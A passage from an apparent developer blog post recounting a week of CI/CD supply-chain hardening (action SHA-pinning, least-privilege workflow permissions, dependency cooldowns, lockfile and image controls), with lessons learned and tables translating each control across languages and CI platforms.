&lt;tr&gt;
&lt;td&gt;Workflow security audit&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;actionlint&lt;/code&gt; + &lt;code&gt;zizmor&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dependency CVE gate&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pnpm audit --prod --audit-level high&lt;/code&gt; with documented allowlist&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SBOM generation&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;CycloneDX + SPDX on every push to main&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The week wasn't a checklist. It was a sequence of specific findings, in the order I hit them:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Day 1: Boundary 7.&lt;/strong&gt; Audit of &lt;code&gt;.github/workflows/&lt;/code&gt;. Every external &lt;code&gt;uses:&lt;/code&gt; was tag-pinned. Pinned all 110 to 40-character SHAs with tag comments. &lt;code&gt;pinact run --check --verify&lt;/code&gt; added as required status check.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 1: Boundary 8.&lt;/strong&gt; 8 of 16 workflows ran with &lt;code&gt;permissions: write-all&lt;/code&gt;. Tightened to workflow-level &lt;code&gt;permissions: {}&lt;/code&gt; plus per-job grants. &lt;code&gt;zizmor&lt;/code&gt; added as the gate. &lt;strong&gt;First staging deploy broke&lt;/strong&gt; because &lt;code&gt;permissions: {}&lt;/code&gt; revealed an undeclared &lt;code&gt;packages: read&lt;/code&gt; that a publish job had been silently inheriting through the old &lt;code&gt;write-all&lt;/code&gt;. Caught in PR; one-line add to per-job permissions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 2: Boundary 9.&lt;/strong&gt; The &lt;code&gt;opencode-review.yml:108&lt;/code&gt; CWE-78 (the lede). Four-line fix.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 2: Boundary 10.&lt;/strong&gt; &lt;code&gt;apps/front/remote-homepage/vite.config.ts:30&lt;/code&gt; had &lt;code&gt;'process.env': process.env,&lt;/code&gt; with a TODO comment. Every CI environment variable visible to the build host was being baked into the client bundle. Replaced with an explicit allowlist.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 3: Boundary 8.&lt;/strong&gt; &lt;code&gt;build-and-publish-service.yml&lt;/code&gt; lines 128 and 469: both Wiz container scan steps had &lt;code&gt;continue-on-error: true || true&lt;/code&gt;. Doubly non-blocking. Two engineers had to reach for the keyboard to make those scans non-fatal. Removed both bypasses.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 3: Boundary 3.&lt;/strong&gt; Lockfile audit found one off-registry tarball: &lt;code&gt;https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz&lt;/code&gt;, in two lambda &lt;code&gt;package.json&lt;/code&gt; files. Allowlisted with rationale (SheetJS withdrew xlsx from npm in 2023).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 12.&lt;/strong&gt; &lt;code&gt;pnpm.overrides&lt;/code&gt; audit; the lodash story below.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 2.&lt;/strong&gt; &lt;code&gt;minimumReleaseAge&lt;/code&gt; calibration: started at 720 minutes (12 hours), tried 10080 (7 days), got blocked by a &lt;code&gt;postcss@8.5.12&lt;/code&gt; patch published four days earlier, settled at 4320 (3 days).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 5.&lt;/strong&gt; Production Dockerfile sweep. 7 of 7 images ran as root. Added &lt;code&gt;USER node&lt;/code&gt;; switched nginx-fronted images to &lt;code&gt;nginxinc/nginx-unprivileged&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 5: Boundary 6.&lt;/strong&gt; Cosign keyless signing on every ECR push. Branch protection updated to require all six new gates as status checks.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The DX cost, honestly.&lt;/strong&gt; PR-time latency went from p50 4m / p95 9m to p50 6m / p95 14m. CodeQL &lt;code&gt;security-extended&lt;/code&gt; is the long pole at ~7m. False-positive rate after the first week of tuning: zizmor ~5%, gitleaks ~2% with the project-tuned config. Two engineers asked for a &lt;code&gt;--no-verify&lt;/code&gt; escape hatch on &lt;code&gt;pinact&lt;/code&gt; early on; we declined. One pushed back hard enough that I owed him a 1:1 walking through the tj-actions chain. The friction is real and you should plan for the conversation. Fast-path bypass: a &lt;code&gt;security-bypass&lt;/code&gt; label requires CODEOWNERS approval, expires on merge, audit-logged.&lt;/p&gt;




&lt;h2&gt;
  
  
  Five lessons that don't fit in a framework
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. The "patched version" you find in an advisory is not always the version you can ship.
&lt;/h3&gt;

&lt;p&gt;On Day 4, the advisory for GHSA-r5fr-rjxr-66jc (HIGH, code injection via &lt;code&gt;_.template&lt;/code&gt;) said "fixed in 4.18.0." Our &lt;code&gt;pnpm.overrides&lt;/code&gt; had &lt;code&gt;lodash-es: 4.18.0&lt;/code&gt; and &lt;code&gt;lodash: 4.18.1&lt;/code&gt;, both flagged green by the advisory.&lt;/p&gt;

&lt;p&gt;Then I checked the npm registry page. 4.18.0 was marked as a deprecated "Bad release." We were pinned to a withdrawn version, which is its own kind of supply-chain debt. The current stable was 4.17.23. The patch wasn't in it.&lt;/p&gt;

&lt;p&gt;I kept the terminal open and ran:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rE&lt;/span&gt; &lt;span class="s1"&gt;'_\.template\('&lt;/span&gt; apps/ libs/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nothing. Across multiple projects, no production source called &lt;code&gt;_.template&lt;/code&gt;. The vulnerable code path was unreachable.&lt;/p&gt;

&lt;p&gt;That grep is a hand-rolled approximation of &lt;strong&gt;reachability analysis&lt;/strong&gt;, the formal name for "is the vulnerable function actually called from your code?" Tools that automate it: Endor Labs, Snyk Reachability, Semgrep Supply Chain, CodeQL with &lt;code&gt;taint-tracking&lt;/code&gt; queries. Eleven seconds with grep is the cheap version of the same idea. The expensive version costs money but covers transitive call paths grep can't see.&lt;/p&gt;

&lt;p&gt;The decision crystallised: allowlist with documented rationale, three-month expiry, named follow-up to migrate off lodash entirely.&lt;/p&gt;

&lt;p&gt;Three months from now the entry expires. CI fails again. Someone re-runs the grep and decides: still unreachable, renew? Or has someone added &lt;code&gt;_.template&lt;/code&gt; to a new feature, in which case the override is no longer safe. Either way, the decision happens. That's the difference between an allowlist with an expiry and an &lt;code&gt;eslint-disable-next-line&lt;/code&gt; that lives forever.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Aggressive controls block legitimate fixes. Calibrate, don't posture.
&lt;/h3&gt;

&lt;p&gt;Started at &lt;code&gt;minimumReleaseAge: 10080&lt;/code&gt; (7 days, pnpm's recommended baseline). Within the hour it blocked &lt;code&gt;postcss@8.5.12&lt;/code&gt;, a CVE patch published four days earlier. Dropped to 3 days.&lt;/p&gt;

&lt;p&gt;The "right" number depends on your workload. A healthcare-staffing platform tolerates 72 hours of CVE-patch latency more easily than fintech tolerates 12. Write down why you picked the number. Three days catches the noisy fast attacks (axios, ua-parser-js, @solana/web3.js were all yanked in &amp;lt;5 hours). It does not catch the patient ones: xz-utils ran for 2 years, and Shai-Hulud's worm, which re-publishes from already-trusted maintainer accounts, can outlast any cooldown. &lt;code&gt;minimumReleaseAge&lt;/code&gt; is a layer, not the wall.&lt;/p&gt;
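&lt;p&gt;For reference, the cooldown itself is one setting in &lt;code&gt;pnpm-workspace.yaml&lt;/code&gt;; a sketch, where the exclude entry is a hypothetical urgent-patch escape hatch:&lt;/p&gt;

```yaml
# pnpm-workspace.yaml; value is in minutes (4320 = 3 days)
minimumReleaseAge: 4320
minimumReleaseAgeExclude:
  - postcss   # hypothetical: let an urgent CVE patch through early
```

&lt;p&gt;An exclude entry deserves the same treatment as an override: rationale, owner, and an expiry, or it quietly becomes a permanent hole in the cooldown.&lt;/p&gt;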

&lt;h3&gt;
  
  
  3. Detection without enforcement is not security.
&lt;/h3&gt;

&lt;p&gt;The week started with the Slack message above. The most striking finding: every right primitive was already in place (Wiz, SonarCloud, Renovate, gitleaks, custom rules), yet none of them were blocking merges. Wiz container scans were running with &lt;code&gt;continue-on-error: true || true&lt;/code&gt;. SonarCloud ran post-merge. Pre-commit gitleaks could be skipped with &lt;code&gt;--no-verify&lt;/code&gt;. Renovate filed PRs nobody was required to merge.&lt;/p&gt;

&lt;p&gt;Moving those gates into PR-time required-status-checks (same tools, same configurations, just &lt;code&gt;required: true&lt;/code&gt; in branch protection) was, in my judgment, the largest delta in actual risk reduction over the week. It's a judgment, not a measurement; we don't have a counterfactual. Take it as senior intuition.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. The blast radius of a CI compromise is usually larger than any application bug.
&lt;/h3&gt;

&lt;p&gt;An app bug leaks data. A CI compromise leaks everything that has ever run through CI: AWS credentials, deploy keys, npm tokens, signing keys, source code, SBOMs, any customer-data backup that happened to touch a build step. Treat CI/CD like production, because it has the same blast radius.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. These controls assume a clean threat model. Both halves of that assumption fail.
&lt;/h3&gt;

&lt;p&gt;Most of the controls above assume the attacker is outside your org and your developers' laptops are clean. Both assumptions fail in roughly half the supply-chain incidents I've seen written up. xz-utils is the canonical maintainer-side case: a multi-year insider whose valid signed commits pass every Phase 1 control. A compromised developer endpoint with a valid signed-commit identity bypasses CODEOWNERS, branch protection, and most of Phase 1. Endpoint posture and maintainer-identity verification are their own conversations. When you decide what to ship next, factor them in.&lt;/p&gt;




&lt;h2&gt;
  
  
  Process and culture
&lt;/h2&gt;

&lt;p&gt;Tools alone don't get you there. The process around them ends up doing more of the work than I'd expected. Three patterns that bound everything else:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CODEOWNERS on every supply-chain surface.&lt;/strong&gt; Required reviewer on every workflow file, Dockerfile, dependency manifest, override file, and &lt;code&gt;audit-allowlist.json&lt;/code&gt; itself. Humans catch what static analysis can't see (intent, weird ownership, deprecated-but-popular packages); machines catch the rest.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Allowlists with expiry, never silent ignores.&lt;/strong&gt; Every accepted risk has rationale, verifier, and a date when it stops being accepted. CI fails at expiry and forces a re-decision rather than letting drift accumulate.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Default-deny as engineering culture.&lt;/strong&gt; &lt;code&gt;permissions: {}&lt;/code&gt; at workflow level. Empty Dockerfile &lt;code&gt;USER&lt;/code&gt; rejected. New dependency needs CODEOWNERS approval. Off-registry tarball needs written rationale. The friction surfaces decisions that would otherwise stay implicit.&lt;/li&gt;
&lt;/ul&gt;
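&lt;p&gt;The default-deny bullet above is only a few lines of workflow YAML. A minimal sketch (the job name and grants are illustrative, and the SHA is a placeholder, not a real pin):&lt;/p&gt;

```yaml
# Workflow-level default deny: no job inherits any token scope.
permissions: {}

jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read        # per-job grant: only what this job needs
    steps:
      # External actions pinned to a full commit SHA, never a tag
      - uses: actions/checkout@<full-commit-sha> # vX.Y.Z
```

&lt;p&gt;The empty &lt;code&gt;permissions: {}&lt;/code&gt; at the top forces every job to state its grants explicitly, which is exactly the friction that surfaces implicit decisions.&lt;/p&gt;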

&lt;p&gt;When &lt;code&gt;zizmor&lt;/code&gt; flags a workflow, gitleaks catches a token, or an audit advisory blocks a merge, the response is "what process let this through?" not "who put it there?" The first question gets you better controls. The second one gets you quieter engineers.&lt;/p&gt;




&lt;h2&gt;
  
  
  What you can ship alone vs. what needs platform
&lt;/h2&gt;

&lt;p&gt;Half the controls above can be adopted by a single team owning a single repo. The other half need platform / security-org buy-in. The trap is adopting the team-side half without the platform-side half: you eat the friction without the protection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A team can ship alone:&lt;/strong&gt; SHA-pinning their own workflows. Lockfile pins. &lt;code&gt;minimumReleaseAge&lt;/code&gt; in their own pnpm/Renovate config. Logger redaction in their own service. Default-deny &lt;code&gt;permissions:&lt;/code&gt; in their own workflows. Dockerfile non-root.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Needs platform / security org:&lt;/strong&gt; CODEOWNERS gating across the org. OIDC trust-policy authoring. Branch protection on &lt;code&gt;main&lt;/code&gt;. Admission controllers verifying cosign signatures at deploy time. Log retention infrastructure. Secret rotation runbooks. Cross-repo CI runner isolation.&lt;/p&gt;

&lt;p&gt;If you're a single team and the platform-side controls don't exist yet, the highest-leverage moves are the three that would have stopped both attacks in this article cold: SHA-pin every external &lt;code&gt;uses:&lt;/code&gt;, scope every &lt;code&gt;permissions:&lt;/code&gt; block to least privilege, set &lt;code&gt;minimumReleaseAge&lt;/code&gt; to 3+ days. The first two are local edits. The third is one config line. Together they're roughly two days of work.&lt;/p&gt;
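&lt;p&gt;For reference, those three moves are each a handful of lines. A sketch, assuming pnpm's &lt;code&gt;minimumReleaseAge&lt;/code&gt; setting (which takes minutes) lives in your &lt;code&gt;pnpm-workspace.yaml&lt;/code&gt;; the SHA is a placeholder:&lt;/p&gt;

```yaml
# .github/workflows/ci.yml -- pin every external action to a commit SHA
# - uses: some-org/some-action@<full-40-char-commit-sha> # v2.1.0
# ...and scope permissions per job:
permissions: {}

# pnpm-workspace.yaml -- refuse packages published less than 3 days ago
minimumReleaseAge: 4320   # minutes (3 days)
```

&lt;p&gt;Check your pnpm version's docs for the exact setting location; older releases configured this elsewhere.&lt;/p&gt;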




&lt;h2&gt;
  
  
  Translation table: the boundaries in your stack
&lt;/h2&gt;

&lt;p&gt;This article uses pnpm + GitHub Actions because that's where I shipped the work. The boundaries don't care about the YAML.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Boundary&lt;/th&gt;
&lt;th&gt;pnpm/JS&lt;/th&gt;
&lt;th&gt;Python&lt;/th&gt;
&lt;th&gt;Java/Maven&lt;/th&gt;
&lt;th&gt;Go&lt;/th&gt;
&lt;th&gt;Rust&lt;/th&gt;
&lt;th&gt;Ruby&lt;/th&gt;
&lt;th&gt;.NET&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2. Pin to immutable identifier&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;package.json&lt;/code&gt; exact + &lt;code&gt;pnpm install --frozen-lockfile&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pip-compile --generate-hashes&lt;/code&gt; + &lt;code&gt;--require-hashes&lt;/code&gt;; or &lt;code&gt;poetry install --no-update&lt;/code&gt;; or &lt;code&gt;uv sync --frozen --locked&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;mvn-dependency-lock-plugin&lt;/code&gt; + &lt;code&gt;dependencies.lock&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;go.sum&lt;/code&gt; + &lt;code&gt;GOFLAGS=-mod=readonly&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Cargo.lock&lt;/code&gt; + &lt;code&gt;cargo --frozen --locked&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Gemfile.lock&lt;/code&gt; + &lt;code&gt;bundle config set frozen true&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;packages.lock.json&lt;/code&gt; + &lt;code&gt;dotnet restore --locked-mode&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2. Cooldown on fresh publishes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;minimumReleaseAge&lt;/code&gt; (pnpm-native)&lt;/td&gt;
&lt;td&gt;Renovate &lt;code&gt;minimumReleaseAge&lt;/code&gt; (covers PyPI); commercial: Socket, Phylum&lt;/td&gt;
&lt;td&gt;Renovate (covers Maven Central)&lt;/td&gt;
&lt;td&gt;Renovate (covers Go modules) + &lt;code&gt;govulncheck&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate; &lt;code&gt;cargo-deny [advisories] yanked = "deny"&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate; &lt;code&gt;bundler-audit&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;3. Lockfile integrity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;integrity: sha512:...&lt;/code&gt; per entry&lt;/td&gt;
&lt;td&gt;hash via &lt;code&gt;--require-hashes&lt;/code&gt;; Poetry &lt;code&gt;content-hash&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Gradle &lt;code&gt;verification-metadata.xml&lt;/code&gt;; Maven &lt;code&gt;--strict-checksums&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;go.sum&lt;/code&gt; + &lt;code&gt;sum.golang.org&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Cargo lockfile checksums (built-in)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;bundle config set verify_files true&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;dotnet trust&lt;/code&gt; for signed packages&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;4. Lifecycle script gate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;onlyBuiltDependencies&lt;/code&gt; + &lt;code&gt;--ignore-scripts&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pip install --only-binary=:all:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;audit &lt;code&gt;&amp;lt;build&amp;gt;&amp;lt;plugins&amp;gt;&lt;/code&gt; + checksum-pin them&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cgo&lt;/code&gt; / &lt;code&gt;//go:generate&lt;/code&gt; controlled via Bazel/Nix sandbox&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;build.rs&lt;/code&gt; sandboxed via Bazel &lt;code&gt;rules_rust&lt;/code&gt; or &lt;code&gt;cargo-deny&lt;/code&gt; bans&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;bundle config force_ruby_platform true&lt;/code&gt; to skip native; or sandbox&lt;/td&gt;
&lt;td&gt;PackageReference (modern) doesn't run scripts; audit any &lt;code&gt;packages.config&lt;/code&gt; projects&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;5. Base image digest pin&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;FROM image:tag@sha256:...&lt;/code&gt; (any Dockerfile, any language)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;6. Image signing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;cosign + Sigstore (any registry, any image)&lt;/td&gt;
&lt;td&gt;same; PEP 740 attestations + &lt;code&gt;sigstore&lt;/code&gt; for wheels&lt;/td&gt;
&lt;td&gt;same; &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; for JARs&lt;/td&gt;
&lt;td&gt;same; &lt;code&gt;slsa-github-generator/builder-go&lt;/code&gt; for SLSA&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cargo-dist&lt;/code&gt; + Sigstore&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;dotnet nuget sign&lt;/code&gt;; NuGet signature verification&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;7. CI mutable-ref pin&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uses: org/action@&amp;lt;sha&amp;gt;&lt;/code&gt;; &lt;code&gt;pinact&lt;/code&gt; enforce&lt;/td&gt;
&lt;td&gt;(Python doesn't have an "Actions" concept; this is CI-platform, not language)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;8. Default-deny permissions&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GHA &lt;code&gt;permissions: {}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;(CI-platform; see CI table below)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;11. Logger redaction&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;pino &lt;code&gt;redact:&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;structlog&lt;/code&gt; processors + &lt;code&gt;logging.Filter&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Logback &lt;code&gt;MaskingPatternLayout&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;zap&lt;/code&gt; custom encoder; &lt;code&gt;zerolog&lt;/code&gt; &lt;code&gt;.Strs("redacted", ...)&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;tracing&lt;/code&gt; &lt;code&gt;Layer&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Rails.config.filter_parameters&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Serilog &lt;code&gt;Enrichers.Sensitive&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;12. Force-pin transitive&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pnpm.overrides&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;pip &lt;code&gt;constraints.txt&lt;/code&gt;; uv &lt;code&gt;[tool.uv] override-dependencies&lt;/code&gt;; Poetry → promote to direct&lt;/td&gt;
&lt;td&gt;Maven &lt;code&gt;&amp;lt;dependencyManagement&amp;gt;&lt;/code&gt;; Gradle &lt;code&gt;dependencySubstitution&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;replace&lt;/code&gt; directive in &lt;code&gt;go.mod&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;[patch.crates-io]&lt;/code&gt; in &lt;code&gt;Cargo.toml&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Direct &lt;code&gt;gem 'foo', '1.2.3'&lt;/code&gt; in &lt;code&gt;Gemfile&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Directory.Packages.props&lt;/code&gt; central management&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;CI translations for Boundaries 5–9:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;GitHub Actions&lt;/th&gt;
&lt;th&gt;GitLab CI&lt;/th&gt;
&lt;th&gt;Buildkite&lt;/th&gt;
&lt;th&gt;CircleCI&lt;/th&gt;
&lt;th&gt;Jenkins&lt;/th&gt;
&lt;th&gt;AWS CodeBuild&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Mutable-ref pin (B7)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uses: org/action@&amp;lt;sha&amp;gt;&lt;/code&gt; + &lt;code&gt;pinact&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;include: ref: &amp;lt;sha&amp;gt;&lt;/code&gt; + Renovate &lt;code&gt;gitlabci-include&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Plugin &lt;code&gt;@&amp;lt;sha&amp;gt;&lt;/code&gt; + Renovate &lt;code&gt;buildkite&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Inline orbs; or pin &lt;code&gt;orbs: foo/bar@&amp;lt;exact-version&amp;gt;&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;@Library('foo@&amp;lt;sha&amp;gt;')&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pre-mirrored installers + checksum verify in &lt;code&gt;pre_build&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Default-deny perms (B8)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;permissions: {}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;id_tokens:&lt;/code&gt; per-job; protected variables&lt;/td&gt;
&lt;td&gt;Agent-queue ACLs; secrets via Vault Agent&lt;/td&gt;
&lt;td&gt;Restricted contexts&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;withCredentials&lt;/code&gt; per-step; folder-level isolation&lt;/td&gt;
&lt;td&gt;Per-project IAM role; &lt;code&gt;SECRETS_MANAGER&lt;/code&gt; vars&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OIDC trust (B8)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;sub&lt;/code&gt;/&lt;code&gt;job_workflow_ref&lt;/code&gt; anchored&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;CI_JOB_JWT_V2&lt;/code&gt; audience-bound&lt;/td&gt;
&lt;td&gt;OIDC plugin since 2023&lt;/td&gt;
&lt;td&gt;&lt;code&gt;circleci/oidc-orb&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Workload identity / &lt;code&gt;manage-credentials-binding-plugin&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;aws sts assume-role-with-web-identity&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Shell injection (B9)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;actionlint&lt;/code&gt; + &lt;code&gt;zizmor&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;glab ci lint&lt;/code&gt;; &lt;code&gt;semgrep p/ci&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;buildkite-pipeline-lint&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;circleci config validate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pipeline Linter; &lt;code&gt;pipeline-utility-steps&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cfn-lint&lt;/code&gt; + &lt;code&gt;checkov&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Image signing identity (B6)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;OIDC issuer &lt;code&gt;token.actions.githubusercontent.com&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;CI_JOB_JWT_V2&lt;/code&gt; issuer&lt;/td&gt;
&lt;td&gt;Buildkite OIDC issuer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;oidc.circleci.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;OIDC via plugin or workload identity&lt;/td&gt;
&lt;td&gt;CodeBuild OIDC tokens&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Cross-cutting tools, alphabetical:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Audit (CVE in deps):&lt;/strong&gt; pnpm/npm &lt;code&gt;audit&lt;/code&gt; → &lt;code&gt;pip-audit&lt;/code&gt; (Python), &lt;code&gt;mvn dependency-check:check&lt;/code&gt; or Gradle &lt;code&gt;dependencyCheckAnalyze&lt;/code&gt; (Java), &lt;code&gt;govulncheck&lt;/code&gt; (Go, symbol-aware reachability), &lt;code&gt;cargo audit&lt;/code&gt; + &lt;code&gt;cargo-deny&lt;/code&gt; (Rust), &lt;code&gt;bundler-audit&lt;/code&gt; (Ruby), &lt;code&gt;dotnet list package --vulnerable --include-transitive&lt;/code&gt; (.NET). Cross-stack: &lt;strong&gt;OSV-Scanner&lt;/strong&gt; (Google; OSV format covers all of the above), Snyk Open Source, Wiz, Socket.&lt;/li&gt;
&lt;li&gt;
